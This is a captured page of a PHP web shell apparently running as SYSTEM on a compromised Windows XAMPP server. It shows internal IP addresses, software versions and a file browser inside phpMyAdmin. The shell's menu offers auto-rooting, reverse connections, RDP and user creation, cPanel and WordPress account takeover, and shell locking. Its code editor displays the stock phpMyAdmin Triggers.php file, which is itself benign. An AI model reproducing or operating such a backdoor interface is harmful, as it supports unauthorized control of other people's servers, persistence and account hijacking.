Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
phpMyAdmin /
libraries /
classes /
Rte /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
Events.php
24.96
KB
-rw-rw-rw-
Export.php
4.59
KB
-rw-rw-rw-
Footer.php
4.92
KB
-rw-rw-rw-
General.php
3.32
KB
-rw-rw-rw-
Routines.php
66.08
KB
-rw-rw-rw-
RteList.php
20.67
KB
-rw-rw-rw-
Triggers.php
18.29
KB
-rw-rw-rw-
Words.php
3.22
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Triggers.php
<?php /* vim: set expandtab sw=4 ts=4 sts=4: */ /** * Functions for trigger management. * * @package PhpMyAdmin */ declare(strict_types=1); namespace PhpMyAdmin\Rte; use PhpMyAdmin\DatabaseInterface; use PhpMyAdmin\Message; use PhpMyAdmin\Response; use PhpMyAdmin\Url; use PhpMyAdmin\Util; /** * PhpMyAdmin\Rte\Triggers class * * @package PhpMyAdmin */ class Triggers { /** * @var Export */ private $export; /** * @var Footer */ private $footer; /** * @var General */ private $general; /** * @var RteList */ private $rteList; /** * @var Words */ private $words; /** * @var DatabaseInterface */ private $dbi; /** * Triggers constructor. * * @param DatabaseInterface $dbi DatabaseInterface object */ public function __construct(DatabaseInterface $dbi) { $this->dbi = $dbi; $this->export = new Export($this->dbi); $this->footer = new Footer($this->dbi); $this->general = new General($this->dbi); $this->rteList = new RteList($this->dbi); $this->words = new Words(); } /** * Sets required globals * * @return void */ public function setGlobals() { global $action_timings, $event_manipulations; // Some definitions for triggers $action_timings = [ 'BEFORE', 'AFTER', ]; $event_manipulations = [ 'INSERT', 'UPDATE', 'DELETE', ]; } /** * Main function for the triggers functionality * * @return void */ public function main() { global $db, $table; $this->setGlobals(); /** * Process all requests */ $this->handleEditor(); $this->export->triggers(); /** * Display a list of available triggers */ $items = $this->dbi->getTriggers($db, $table); echo $this->rteList->get('trigger', $items); /** * Display a link for adding a new trigger, * if the user has the necessary privileges */ echo $this->footer->triggers(); } /** * Handles editor requests for adding or editing an item * * @return void */ public function handleEditor() { global $errors, $db, $table; if (! empty($_POST['editor_process_add']) || ! empty($_POST['editor_process_edit']) ) { $sql_query = ''; $item_query = $this->getQueryFromRequest(); if (! count($errors)) { // set by PhpMyAdmin\Rte\Routines::getQueryFromRequest() // Execute the created query if (! empty($_POST['editor_process_edit'])) { // Backup the old trigger, in case something goes wrong $trigger = $this->getDataFromName($_POST['item_original_name']); $create_item = $trigger['create']; $drop_item = $trigger['drop'] . ';'; $result = $this->dbi->tryQuery($drop_item); if (! $result) { $errors[] = sprintf( __('The following query has failed: "%s"'), htmlspecialchars($drop_item) ) . '<br>' . __('MySQL said: ') . $this->dbi->getError(); } else { $result = $this->dbi->tryQuery($item_query); if (! $result) { $errors[] = sprintf( __('The following query has failed: "%s"'), htmlspecialchars($item_query) ) . '<br>' . __('MySQL said: ') . $this->dbi->getError(); // We dropped the old item, but were unable to create the // new one. Try to restore the backup query. $result = $this->dbi->tryQuery($create_item); $errors = $this->general->checkResult( $result, __( 'Sorry, we failed to restore the dropped trigger.' ), $create_item, $errors ); } else { $message = Message::success( __('Trigger %1$s has been modified.') ); $message->addParam( Util::backquote($_POST['item_name']) ); $sql_query = $drop_item . $item_query; } } } else { // 'Add a new item' mode $result = $this->dbi->tryQuery($item_query); if (! $result) { $errors[] = sprintf( __('The following query has failed: "%s"'), htmlspecialchars($item_query) ) . '<br><br>' . __('MySQL said: ') . $this->dbi->getError(); } else { $message = Message::success( __('Trigger %1$s has been created.') ); $message->addParam( Util::backquote($_POST['item_name']) ); $sql_query = $item_query; } } } if (count($errors)) { $message = Message::error( '<b>' . __( 'One or more errors have occurred while processing your request:' ) . '</b>' ); $message->addHtml('<ul>'); foreach ($errors as $string) { $message->addHtml('<li>' . $string . '</li>'); } $message->addHtml('</ul>'); } $output = Util::getMessage($message, $sql_query); $response = Response::getInstance(); if ($response->isAjax()) { if ($message->isSuccess()) { $items = $this->dbi->getTriggers($db, $table, ''); $trigger = false; foreach ($items as $value) { if ($value['name'] == $_POST['item_name']) { $trigger = $value; } } $insert = false; if (empty($table) || ($trigger !== false && $table == $trigger['table']) ) { $insert = true; $response->addJSON('new_row', $this->rteList->getTriggerRow($trigger)); $response->addJSON( 'name', htmlspecialchars( mb_strtoupper( $_POST['item_name'] ) ) ); } $response->addJSON('insert', $insert); $response->addJSON('message', $output); } else { $response->addJSON('message', $message); $response->setRequestStatus(false); } exit; } } /** * Display a form used to add/edit a trigger, if necessary */ if (count($errors) || (empty($_POST['editor_process_add']) && empty($_POST['editor_process_edit']) && (! empty($_REQUEST['add_item']) || ! empty($_REQUEST['edit_item']))) // FIXME: this must be simpler than that ) { // Get the data for the form (if any) if (! empty($_REQUEST['add_item'])) { $title = $this->words->get('add'); $item = $this->getDataFromRequest(); $mode = 'add'; } elseif (! empty($_REQUEST['edit_item'])) { $title = __("Edit trigger"); if (! empty($_REQUEST['item_name']) && empty($_POST['editor_process_edit']) ) { $item = $this->getDataFromName($_REQUEST['item_name']); if ($item !== false) { $item['item_original_name'] = $item['item_name']; } } else { $item = $this->getDataFromRequest(); } $mode = 'edit'; } $this->general->sendEditor('TRI', $mode, $item, $title, $db); } } /** * This function will generate the values that are required to for the editor * * @return array Data necessary to create the editor. */ public function getDataFromRequest() { $retval = []; $indices = [ 'item_name', 'item_table', 'item_original_name', 'item_action_timing', 'item_event_manipulation', 'item_definition', 'item_definer', ]; foreach ($indices as $index) { $retval[$index] = isset($_POST[$index]) ? $_POST[$index] : ''; } return $retval; } /** * This function will generate the values that are required to complete * the "Edit trigger" form given the name of a trigger. * * @param string $name The name of the trigger. * * @return array|bool Data necessary to create the editor. */ public function getDataFromName($name) { global $db, $table; $temp = []; $items = $this->dbi->getTriggers($db, $table, ''); foreach ($items as $value) { if ($value['name'] == $name) { $temp = $value; } } if (empty($temp)) { return false; } else { $retval = []; $retval['create'] = $temp['create']; $retval['drop'] = $temp['drop']; $retval['item_name'] = $temp['name']; $retval['item_table'] = $temp['table']; $retval['item_action_timing'] = $temp['action_timing']; $retval['item_event_manipulation'] = $temp['event_manipulation']; $retval['item_definition'] = $temp['definition']; $retval['item_definer'] = $temp['definer']; return $retval; } } /** * Displays a form used to add/edit a trigger * * @param string $mode If the editor will be used to edit a trigger * or add a new one: 'edit' or 'add'. * @param array $item Data for the trigger returned by getDataFromRequest() * or getDataFromName() * * @return string HTML code for the editor. */ public function getEditorForm($mode, array $item) { global $db, $table, $event_manipulations, $action_timings; $modeToUpper = mb_strtoupper($mode); $response = Response::getInstance(); // Escape special characters $need_escape = [ 'item_original_name', 'item_name', 'item_definition', 'item_definer', ]; foreach ($need_escape as $key => $index) { $item[$index] = htmlentities($item[$index], ENT_QUOTES, 'UTF-8'); } $original_data = ''; if ($mode == 'edit') { $original_data = "<input name='item_original_name' " . "type='hidden' value='{$item['item_original_name']}'>\n"; } $query = "SELECT `TABLE_NAME` FROM `INFORMATION_SCHEMA`.`TABLES` "; $query .= "WHERE `TABLE_SCHEMA`='" . $this->dbi->escapeString($db) . "' "; $query .= "AND `TABLE_TYPE` IN ('BASE TABLE', 'SYSTEM VERSIONED')"; $tables = $this->dbi->fetchResult($query); // Create the output $retval = ""; $retval .= "<!-- START " . $modeToUpper . " TRIGGER FORM -->\n\n"; $retval .= "<form class='rte_form' action='db_triggers.php' method='post'>\n"; $retval .= "<input name='{$mode}_item' type='hidden' value='1'>\n"; $retval .= $original_data; $retval .= Url::getHiddenInputs($db, $table) . "\n"; $retval .= "<fieldset>\n"; $retval .= "<legend>" . __('Details') . "</legend>\n"; $retval .= "<table class='rte_table'>\n"; $retval .= "<tr>\n"; $retval .= " <td>" . __('Trigger name') . "</td>\n"; $retval .= " <td><input type='text' name='item_name' maxlength='64'\n"; $retval .= " value='{$item['item_name']}'></td>\n"; $retval .= "</tr>\n"; $retval .= "<tr>\n"; $retval .= " <td>" . __('Table') . "</td>\n"; $retval .= " <td>\n"; $retval .= " <select name='item_table'>\n"; foreach ($tables as $key => $value) { $selected = ""; if ($mode == 'add' && $value == $table) { $selected = " selected='selected'"; } elseif ($mode == 'edit' && $value == $item['item_table']) { $selected = " selected='selected'"; } $retval .= "<option$selected>"; $retval .= htmlspecialchars($value); $retval .= "</option>\n"; } $retval .= " </select>\n"; $retval .= " </td>\n"; $retval .= "</tr>\n"; $retval .= "<tr>\n"; $retval .= " <td>" . _pgettext('Trigger action time', 'Time') . "</td>\n"; $retval .= " <td><select name='item_timing'>\n"; foreach ($action_timings as $key => $value) { $selected = ""; if (! empty($item['item_action_timing']) && $item['item_action_timing'] == $value ) { $selected = " selected='selected'"; } $retval .= "<option$selected>$value</option>"; } $retval .= " </select></td>\n"; $retval .= "</tr>\n"; $retval .= "<tr>\n"; $retval .= " <td>" . __('Event') . "</td>\n"; $retval .= " <td><select name='item_event'>\n"; foreach ($event_manipulations as $key => $value) { $selected = ""; if (! empty($item['item_event_manipulation']) && $item['item_event_manipulation'] == $value ) { $selected = " selected='selected'"; } $retval .= "<option$selected>$value</option>"; } $retval .= " </select></td>\n"; $retval .= "</tr>\n"; $retval .= "<tr>\n"; $retval .= " <td>" . __('Definition') . "</td>\n"; $retval .= " <td><textarea name='item_definition' rows='15' cols='40'>"; $retval .= $item['item_definition']; $retval .= "</textarea></td>\n"; $retval .= "</tr>\n"; $retval .= "<tr>\n"; $retval .= " <td>" . __('Definer') . "</td>\n"; $retval .= " <td><input type='text' name='item_definer'\n"; $retval .= " value='{$item['item_definer']}'></td>\n"; $retval .= "</tr>\n"; $retval .= "</table>\n"; $retval .= "</fieldset>\n"; if ($response->isAjax()) { $retval .= "<input type='hidden' name='editor_process_{$mode}'\n"; $retval .= " value='true'>\n"; $retval .= "<input type='hidden' name='ajax_request' value='true'>\n"; } else { $retval .= "<fieldset class='tblFooters'>\n"; $retval .= " <input type='submit' name='editor_process_{$mode}'\n"; $retval .= " value='" . __('Go') . "'>\n"; $retval .= "</fieldset>\n"; } $retval .= "</form>\n\n"; $retval .= "<!-- END " . $modeToUpper . " TRIGGER FORM -->\n\n"; return $retval; } /** * Composes the query necessary to create a trigger from an HTTP request. * * @return string The CREATE TRIGGER query. */ public function getQueryFromRequest() { global $db, $errors, $action_timings, $event_manipulations; $query = 'CREATE '; if (! empty($_POST['item_definer'])) { if (mb_strpos($_POST['item_definer'], '@') !== false ) { $arr = explode('@', $_POST['item_definer']); $query .= 'DEFINER=' . Util::backquote($arr[0]); $query .= '@' . Util::backquote($arr[1]) . ' '; } else { $errors[] = __('The definer must be in the "username@hostname" format!'); } } $query .= 'TRIGGER '; if (! empty($_POST['item_name'])) { $query .= Util::backquote($_POST['item_name']) . ' '; } else { $errors[] = __('You must provide a trigger name!'); } if (! empty($_POST['item_timing']) && in_array($_POST['item_timing'], $action_timings) ) { $query .= $_POST['item_timing'] . ' '; } else { $errors[] = __('You must provide a valid timing for the trigger!'); } if (! empty($_POST['item_event']) && in_array($_POST['item_event'], $event_manipulations) ) { $query .= $_POST['item_event'] . ' '; } else { $errors[] = __('You must provide a valid event for the trigger!'); } $query .= 'ON '; if (! empty($_POST['item_table']) && in_array($_POST['item_table'], $this->dbi->getTables($db)) ) { $query .= Util::backquote($_POST['item_table']); } else { $errors[] = __('You must provide a valid table name!'); } $query .= ' FOR EACH ROW '; if (! empty($_POST['item_definition'])) { $query .= $_POST['item_definition']; } else { $errors[] = __('You must provide a trigger definition.'); } return $query; } }
Close
